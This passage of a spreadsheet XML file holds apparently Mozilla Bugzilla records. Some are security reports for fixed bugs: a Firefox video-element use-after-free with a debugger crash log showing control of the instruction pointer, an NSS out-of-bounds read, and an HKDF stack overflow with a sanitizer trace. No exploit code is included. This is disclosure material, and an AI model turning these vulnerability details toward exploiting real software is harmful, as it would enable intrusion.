          <t>normal</t>
        </is>
      </c>
      <c r="S1526" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1526" t="n">
        <v>1</v>
      </c>
      <c r="U1526" t="n">
        <v>0</v>
      </c>
      <c r="V1526" t="n">
        <v>3</v>
      </c>
      <c r="W1526" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 383.
It consists of the following:
(current tag: 382 - `cc59377`)
`ddcf187`: bug 1557012: add Allocator&lt;T&gt;::malloc to prefix list (willkg)
`761ffc7`: bug 1555744: support --host and --processed in fetch_crash_data (willkg)
`3bd5e54`: bug 1552898: add product_details and validation test (willkg)
`939fe1b`: Fix quotes and clarify valid versions (willkg)
`200721c`: Add test for list-of-strings (willkg)
`8e005cd`: bug 1552898: fix product_details link in README (willkg)
`be6557f`: bug 1552898: implement manual featured versions (willkg)
`73a4465`: bug 1552989: add tests (willkg)
`4e0ffb4`: bug 1552898: fix product details url (willkg)
`829727c`: Update Fennec Nightly version to 68.0a1 (rvandermeulen)
(next tag: 383 - `5c788b0`)</t>
        </is>
      </c>
      <c r="X1526" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1527">
      <c r="A1527" t="n">
        <v>1198435</v>
      </c>
      <c r="B1527" t="inlineStr">
        <is>
          <t>2015-08-25 12:26:15 -0700</t>
        </is>
      </c>
      <c r="C1527" t="inlineStr">
        <is>
          <t>HTMLVideoElement Use-After-Free Remote Code Execution (ZDI-CAN-3176)</t>
        </is>
      </c>
      <c r="D1527" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:49 -0700</t>
        </is>
      </c>
      <c r="E1527" t="n">
        <v>1</v>
      </c>
      <c r="F1527" t="n">
        <v>1</v>
      </c>
      <c r="G1527" t="n">
        <v>3</v>
      </c>
      <c r="H1527" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1527" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1527" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1527" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1527" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1527" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N1527" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1527" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1527" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q1527" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1527" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1527" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1527" t="n">
        <v>1</v>
      </c>
      <c r="U1527" t="n">
        <v>0</v>
      </c>
      <c r="V1527" t="n">
        <v>51</v>
      </c>
      <c r="W1527" t="inlineStr">
        <is>
          <t>Created attachment 8652496
ZDI-CAN-3176.zip (pw: ZDI-CAN-3176)
ZDI sent this vulnerability to our security reporting address. Have not yet confirmed it (need to fire up the windows machine) bug eip=41414141 is a pretty reliable sign of exploitability.
-- VULNERABILITY DETAILS ------------------------
Tested against Firefox 40.0.2 and a nightly build from August 17th on Windows 8.1
Crash info against the release build:
```
[JavaScript Error: "Win error 2 during operation open on file C:\Users\ZDI\AppData\Local\Mozilla\Firefox\Profiles\sg8qwckf.default\directoryLinks.json (The system cannot find the file specified.
)" {file: "resource:///modules/DirectoryLinksProvider.jsm" line: 558}]
[JavaScript Warning: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://snippets.cdn.mozilla.net/4/Firefox/40.0.2/20150812163655/WINNT_x86-msvc/en-US/release/Windows_NT%206.3/default/default/. (Reason: CORS request failed)."]
[JavaScript Warning: "An IndexedDB transaction that was not yet complete has been aborted due to page navigation." {file: "chrome://browser/content/abouthome/aboutHome.js" line: 228}]
[JavaScript Warning: "An IndexedDB transaction that was not yet complete has been aborted due to page navigation." {file: "chrome://browser/content/abouthome/aboutHome.js" line: 278}]
[JavaScript Warning: "An IndexedDB transaction that was not yet complete has been aborted due to page navigation." {file: "chrome://browser/content/abouthome/aboutHome.js" line: 289}]
1439870619576   Browser.SelfSupportBackend  WARN    onLocationChange - There was a problem fetching the SelfSupport URL (attempt 0).
[JavaScript Warning: "Key event not available on some keyboard layouts: key="r" modifiers="accel,alt"" {file: "chrome://browser/content/browser.xul" line: 0}]
[JavaScript Warning: "Key event not available on some keyboard layouts: key="c" modifiers="accel,alt"" {file: "chrome://browser/content/browser.xul" line: 0}]
[JavaScript Warning: "Key event not available on some keyboard layouts: key="i" modifiers="accel,alt,shift"" {file: "chrome://browser/content/browser.xul" line: 0}]
[JavaScript Error: "TelemetryStopwatch: key "PLACES_AUTOCOMPLETE_URLINLINE_DOMAIN_QUERY_TIME_MS" was already initialized" {file: "resource://gre/modules/TelemetryStopwatch.jsm" line: 52}]
[JavaScript Warning: "&lt;source&gt; element has no "src" attribute. Media resource load failed." {file: "http://172.16.208.3/PoC-EIP-0x41414141/poc.html" line: 0}]
[JavaScript Warning: "All candidate resources failed to load. Media load paused." {file: "http://172.16.208.3/PoC-EIP-0x41414141/poc.html" line: 0}]
[JavaScript Error: "The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if the document contains characters from outside the US-ASCII range. The character encoding of the page must be declared in the document or in the transfer protocol." {file: "http://172.16.208.3/PoC-EIP-0x41414141/poc.html" line: 0}]
[JavaScript Warning: "HTTP load failed with status 404. Load of media resource http://172.16.208.3/PoC-EIP-0x41414141/nothing failed." {file: "http://172.16.208.3/PoC-EIP-0x41414141/poc.html" line: 0}]
[JavaScript Warning: "All candidate resources failed to load. Media load paused." {file: "http://172.16.208.3/PoC-EIP-0x41414141/poc.html" line: 0}]
1439870649798   Browser.SelfSupportBackend  WARN    onLocationChange - There was a problem fetching the SelfSupport URL (attempt 1).
(b38.fcc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c1626d0 ebx=11a1f400 ecx=41414141 edx=41414141 esi=00000000 edi=0078eec4
eip=41414141 esp=0078ee98 ebp=00000008 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210297
41414141 41              inc     ecx
0:000&gt; kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0078ee94 5cc0453f 41414141 0c164ca0 0078eec4 0x41414141
0078eebc 5cc03d6e 0befa8a0 12530ccc 0c1651a0 xul!mozilla::dom::HTMLMediaElement::LookupMediaElementURITable+0x8e (FPO: [1,2,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\htmlmediaelement.cpp @ 2034]
0078efb0 5cc03b8d 00000000 12530c00 02142cf0 xul!mozilla::dom::HTMLMediaElement::LoadResource+0x11f (FPO: [0,55,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\htmlmediaelement.cpp @ 1190]
0078f2b8 5cc09ebd 02142cf0 0be18c40 12530c00 xul!mozilla::dom::HTMLMediaElement::LoadFromSourceChildren+0x27b (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\htmlmediaelement.cpp @ 1028]
0078f3cc 5cc09edf 0a8abd00 5bc7d922 5cc096f3 xul!mozilla::dom::HTMLMediaElement::SelectResource+0x197 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\htmlmediaelement.cpp @ 903]
0078f3d4 5bc7d922 5cc096f3 0a8abc40 00000010 xul!mozilla::dom::HTMLMediaElement::SelectResourceWrapper+0x8 (FPO: [0,0,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\htmlmediaelement.cpp @ 841]
0078f3d8 5cc096f3 0a8abc40 00000010 5bda58b8 xul!nsRunnableMethodImpl&lt;void (__thiscall mozilla::dom::quota::QuotaManager::*)(void),1&gt;::Run+0x15 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\nsthreadutils.h @ 811]
0078f3e4 5bda58b8 0a8abd00 021411d0 02142cf4 xul!mozilla::dom::nsSyncSection::Run+0x19 (FPO: [1,0,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\html\htmlmediaelement.cpp @ 764]
0078f400 5bda584e 00000001 00000000 5d6814e0 xul!nsBaseAppShell::RunSyncSectionsInternal+0x68 (FPO: [2,1,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\nsbaseappshell.cpp @ 370]
0078f410 5bda4ee6 02142cf4 021411d0 00000000 xul!nsBaseAppShell::AfterProcessNextEvent+0x21 (FPO: [4,1,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\nsbaseappshell.cpp @ 434]
0078f534 5bfcceac 021411d0 00000001 0078f54f xul!nsThread::ProcessNextEvent+0x6f6 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\threads\nsthread.cpp @ 904]
0078f550 5bda848d 02161300 02161300 0078f5ac xul!NS_ProcessNextEvent+0x1a (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\glue\nsthreadutils.cpp @ 265]
0078f574 5bda75b5 02161300 3a3eb85d 02142cf0 xul!mozilla::ipc::MessagePump::Run+0xb7 (FPO: [1,4,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\glue\messagepump.cpp @ 128]
0078f5ac 5bda7747 021411d0 00000001 5bf32b00 xul!MessageLoop::RunHandler+0x20 (FPO: [SEH]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 227]
0078f5cc 5bda5bfb 0a8488c0 00000000 5bda677e xul!MessageLoop::Run+0x19 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 201]
0078f5d8 5bda677e 02142cf0 0a8488c0 5bdcf0af xul!nsBaseAppShell::Run+0x32 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\nsbaseappshell.cpp @ 167]
0078f5e4 5bdcf0af 02142cf0 0078f85d 0fa26260 xul!nsAppShell::Run+0x1b (FPO: [1,0,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nsappshell.cpp @ 178]
0078f5f4 5c0118fc 0a8488c0 0078f764 0078f780 xul!nsAppStartup::Run+0x20 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\components\startup\nsappstartup.cpp @ 281]
0078f6d0 5c0127ee 00000001 0078f8a8 0211c160 xul!XREMain::XRE_mainRun+0x499 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4079]
0078f6ec 5c137e6c 00000000 018a5ff8 0078f800 xul!XREMain::XRE_main+0x1b2 (FPO: [3,2,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4170]
0078f860 000a1635 00000001 018a5ff8 0078f8a8 xul!XRE_main+0x3e (FPO: [4,87,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4260]
0078f9f4 000a12dc 0211c160 018a9ff8 ffffc000 firefox!do_main+0x125 (FPO: [1,92,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 214]
0078fa88 000a10dc 000a2521 000a2521 0078fae4 firefox!NS_internal_main+0xec (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 480]
0078fa9c 000a24a4 018a5ff8 0184ff98 01851f70 firefox!wmain+0xbc (FPO: [2,0,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nswindowswmain.cpp @ 138]
0078fae4 758b4198 7f7df000 758b4170 1a81bdec firefox!__tmainCRTStartup+0xfe (FPO: [Non-Fpo]) (CONV: cdecl) [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
0078faf8 779132d1 7f7df000 9a3e1a74 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
0078fb40 7791329f ffffffff 7793f054 00000000 ntdll!__RtlUserThreadStart+0x2b (FPO: [SEH])
0078fb50 00000000 000a2521 7f7df000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
0:000&gt; !lmi xul
Loaded Module Info: [xul]
         Module: xul
   Base Address: 5bb60000
     Image Name: C:\Program Files\Mozilla Firefox\xul.dll
   Machine Type: 332 (I386)
     Time Stamp: 55cc02db Wed Aug 12 19:37:15 2015
           Size: 2401000
       CheckSum: 2368004
Characteristics: 2122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    76, 1d9ea98, 1d9d498 RSDS - GUID: {B89D751B-2F9D-420E-AAEE-FD53D90CF5BF}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\toolkit\library\xul.pdb
                   ??    14, 1d9eb10, 1d9d510 [Data not mapped]
                CLSID     4, 1d9eb24, 1d9d524 [Data not mapped]
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\xul.dll
    Symbol Type: PDB      - Symbols loaded successfully from image path.
                 z:\export\symbols\xul.pdb\B89D751B2F9D420EAAEEFD53D90CF5BF2\xul.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
                 z:\export\symbols\xul.pdb\B89D751B2F9D420EAAEEFD53D90CF5BF2\xul.pdb
0:000&gt; lmvm xul
start    end        module name
5bb60000 5df61000   xul        (private pdb symbols)  z:\export\symbols\xul.pdb\B89D751B2F9D420EAAEEFD53D90CF5BF2\xul.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\xul.dll
    Image path: C:\Program Files\Mozilla Firefox\xul.dll
    Image name: xul.dll
    Timestamp:        Wed Aug 12 19:37:15 2015 (55CC02DB)
    CheckSum:         02368004
    ImageSize:        02401000
    File version:     40.0.2.5702
    Product version:  40.0.2.5702
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: xul.dll
    ProductVersion:   40.0.2
    FileVersion:      40.0.2
    FileDescription:  40.0.2
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
0:000&gt; vertarget
Windows 8 Version 9600 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.3.9600.17415 (winblue_r4.141028-1500)
Machine Name:
Debug session time: Mon Aug 17 21:05:17.968 2015 (UTC - 7:00)
System Uptime: 0 days 0:05:00.332
Process Uptime: 0 days 0:02:02.507
  Kernel time: 0 days 0:00:19.718
  User time: 0 days 0:00:02.234
```
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Anonymous working with HP's Zero Day Initiative
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 120 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@hp.com</t>
        </is>
      </c>
      <c r="X1527" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" t="n">
        <v>628053</v>
      </c>
      <c r="B1528" t="inlineStr">
        <is>
          <t>2011-01-22 14:49:53 -0800</t>
        </is>
      </c>
      <c r="C1528" t="inlineStr">
        <is>
          <t>Incorrect text for link in "Table of Contents"</t>
        </is>
      </c>
      <c r="D1528" t="inlineStr">
        <is>
          <t>2011-02-01 13:02:48 -0800</t>
        </is>
      </c>
      <c r="E1528" t="n">
        <v>1</v>
      </c>
      <c r="F1528" t="n">
        <v>1</v>
      </c>
      <c r="G1528" t="n">
        <v>5</v>
      </c>
      <c r="H1528" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1528" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1528" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1528" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1528" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1528" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1528" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1528" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1528" t="inlineStr"/>
      <c r="Q1528" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1528" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1528" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T1528" t="n">
        <v>1</v>
      </c>
      <c r="U1528" t="n">
        <v>0</v>
      </c>
      <c r="V1528" t="n">
        <v>6</v>
      </c>
      <c r="W1528" t="inlineStr">
        <is>
          <t>1) Visit https://support.mozilla.com/en-US/kb/Menu%20Reference
2) In "Table of Contents" have a look at link "ExitQuit". 
There should be text "Exit" or "Quit" based on OS, not both strings.</t>
        </is>
      </c>
      <c r="X1528" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" t="n">
        <v>629816</v>
      </c>
      <c r="B1529" t="inlineStr">
        <is>
          <t>2011-01-28 16:17:26 -0800</t>
        </is>
      </c>
      <c r="C1529" t="inlineStr">
        <is>
          <t>CERT_DecodeCertPackage reads bytes outside the input buffer</t>
        </is>
      </c>
      <c r="D1529" t="inlineStr">
        <is>
          <t>2014-11-19 19:37:32 -0800</t>
        </is>
      </c>
      <c r="E1529" t="n">
        <v>1</v>
      </c>
      <c r="F1529" t="n">
        <v>1</v>
      </c>
      <c r="G1529" t="n">
        <v>3</v>
      </c>
      <c r="H1529" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1529" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1529" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1529" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1529" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1529" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1529" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q1529" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1529" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1529" t="inlineStr">
        <is>
          <t>3.14.2</t>
        </is>
      </c>
      <c r="T1529" t="n">
        <v>1</v>
      </c>
      <c r="U1529" t="n">
        <v>0</v>
      </c>
      <c r="V1529" t="n">
        <v>39</v>
      </c>
      <c r="W1529" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.83 Safari/534.13
Build Identifier: 
http://mxr.mozilla.org/security/source/security/nss/lib/pkcs7/certread.c#187
CERT_DecodeCertPackage may read bytes outside of the input buffer.
First, it reads certbuf[0] and certbuf[1] without checking certlen.
Though, it may be assuming the input is zero-terminated. But even in that case it's incorrect: for example, at line 218, it reads certbuf[5] ( cp[4] ), but it only knows that bytes certbuf[0] and certbuf[1] are nonzero; it never makes sure that certbuf[2], 3, and 4 are nonzero.
This may result in the program crashing if the procedure (and CERT_DecodeCertFromPackage, which calls it) is supplied with a very small input.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1529" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1530">
      <c r="A1530" t="n">
        <v>1577953</v>
      </c>
      <c r="B1530" t="inlineStr">
        <is>
          <t>2019-08-30 19:49:03 -0700</t>
        </is>
      </c>
      <c r="C1530" t="inlineStr">
        <is>
          <t>HKDF SHA1 stack buffer overflow (write)</t>
        </is>
      </c>
      <c r="D1530" t="inlineStr">
        <is>
          <t>2024-05-30 10:02:22 -0700</t>
        </is>
      </c>
      <c r="E1530" t="n">
        <v>1</v>
      </c>
      <c r="F1530" t="n">
        <v>1</v>
      </c>
      <c r="G1530" t="n">
        <v>3</v>
      </c>
      <c r="H1530" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1530" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1530" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1530" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1530" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1530" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1530" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1530" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1530" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main70+][adv-esr68.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1530" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1530" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1530" t="inlineStr">
        <is>
          <t>3.47</t>
        </is>
      </c>
      <c r="T1530" t="n">
        <v>1</v>
      </c>
      <c r="U1530" t="n">
        <v>0</v>
      </c>
      <c r="V1530" t="n">
        <v>20</v>
      </c>
      <c r="W1530" t="inlineStr">
        <is>
          <t>Created attachment 9089594
poc_hkdf_sha1_oob_write.cpp
=================================================================
==31990==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc26494f80 at pc 0x000000afd696 bp 0x7ffc26494910 sp 0x7ffc26494908
WRITE of size 4 at 0x7ffc26494f80 thread T0
    #0 0xafd695 in SHA1_End /home/jhg/nss/nss/out/Debug/../../lib/freebl/sha_fast.c:174:5
    #1 0x97e8ce in HMAC_Finish /home/jhg/nss/nss/out/Debug/../../lib/freebl/alghmac.c:133:5
    #2 0x68fcca in NSC_DeriveKey /home/jhg/nss/nss/out/Debug/../../lib/softoken/pkcs11c.c:7951:21
    #3 0x56b033 in PK11_DeriveWithTemplate /home/jhg/nss/nss/out/Debug/../../lib/pk11wrap/pk11skey.c:1609:15
    #4 0x569c3f in PK11_Derive /home/jhg/nss/nss/out/Debug/../../lib/pk11wrap/pk11skey.c:1465:12
    #5 0x5192eb in main /home/jhg/nss/cryptofuzz/poc_hkdf_sha1_oob_write.cpp:38:28
    #6 0x7f169494eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #7 0x41c729 in _start (/home/jhg/nss/cryptofuzz/a.out+0x41c729)
Address 0x7ffc26494f80 is located in stack of thread T0 at offset 800 in frame
    #0 0x681abf in NSC_DeriveKey /home/jhg/nss/nss/out/Debug/../../lib/softoken/pkcs11c.c:6504
  This frame has 34 object(s):
    [32, 40) 'crv' (line 6519)
    [64, 65) 'cktrue' (line 6520)
    [80, 88) 'keyType' (line 6521)
    [112, 120) 'classType' (line 6522)
    [144, 148) 'outLen' (line 6530)
    [160, 180) 'sha_out' (line 6531)
    [224, 800) 'key_block' (line 6532) &lt;== Memory access at offset 800 overflows this variable
    [928, 992) 'crsrdata' (line 6711)
    [1024, 1048) 'crsr' (line 6793)
    [1088, 1112) 'master' (line 6794)
    [1152, 1176) 'pms' (line 6795)
    [1216, 1240) 'pms231' (line 6877)
    [1280, 1304) 'seed' (line 6878)
    [1344, 1368) 'master232' (line 6879)
    [1408, 1472) 'srcrdata' (line 6978)
    [1504, 1568) 'crsrdata310' (line 6979)
    [1600, 1624) 'srcr' (line 7075)
    [1664, 1688) 'keyblk' (line 7076)
    [1728, 1752) 'master375' (line 7077)
    [1792, 1816) 'des3key' (line 7211)
    [1856, 1880) 'derived' (line 7659)
    [1920, 1944) 'dhPublic' (line 7659)
    [1984, 2008) 'dhPrime' (line 7660)
    [2048, 2072) 'dhSubPrime' (line 7660)
    [2112, 2136) 'dhValue' (line 7660)
    [2176, 2200) 'ecScalar' (line 7707)
    [2240, 2264) 'ecPoint' (line 7707)
    [2304, 2328) 'tmp' (line 7708)
    [2368, 2376) 'secret' (line 7710)
    [2400, 2424) 'newPoint' (line 7742)
    [2464, 2528) 'hashbuf' (line 7863)
    [2560, 2564) 'bufLen' (line 7897)
    [2576, 2577) 'bi' (line 7934)
    [2592, 2596) 'len1088' (line 7942)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/jhg/nss/nss/out/Debug/../../lib/freebl/sha_fast.c:174:5 in SHA1_End
Shadow bytes around the buggy address:
  0x100004c8a9a0: 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x100004c8a9b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100004c8a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100004c8a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100004c8a9e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x100004c8a9f0:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x100004c8aa00: f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f2
  0x100004c8aa10: f2 f2 f2 f2 f8 f8 f8 f2 f2 f2 f2 f2 f8 f8 f8 f2
  0x100004c8aa20: f2 f2 f2 f2 f8 f8 f8 f2 f2 f2 f2 f2 f8 f8 f8 f2
  0x100004c8aa30: f2 f2 f2 f2 f8 f8 f8 f2 f2 f2 f2 f2 f8 f8 f8 f8
  0x100004c8aa40: f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8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31990==ABORTING</t>
        </is>
      </c>
      <c r="X1530" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1531">
      <c r="A1531" t="n">
        <v>108385</v>
      </c>
      <c r="B1531" t="inlineStr">
        <is>
          <t>2001-11-03 21:01:30 -0800</t>
        </is>
      </c>
      <c r="C1531" t="inlineStr">
        <is>
          <t>[security] Possible to add comments to a bug as someone else</t>
        </is>
      </c>
      <c r="D1531" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E1531" t="n">
        <v>1</v>
      </c>
      <c r="F1531" t="n">
        <v>1</v>
      </c>
      <c r="G1531" t="n">
        <v>4</v>
      </c>
      <c r="H1531" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1531" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1531" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1531" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1531" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1531" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1531" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q1531" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1531" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
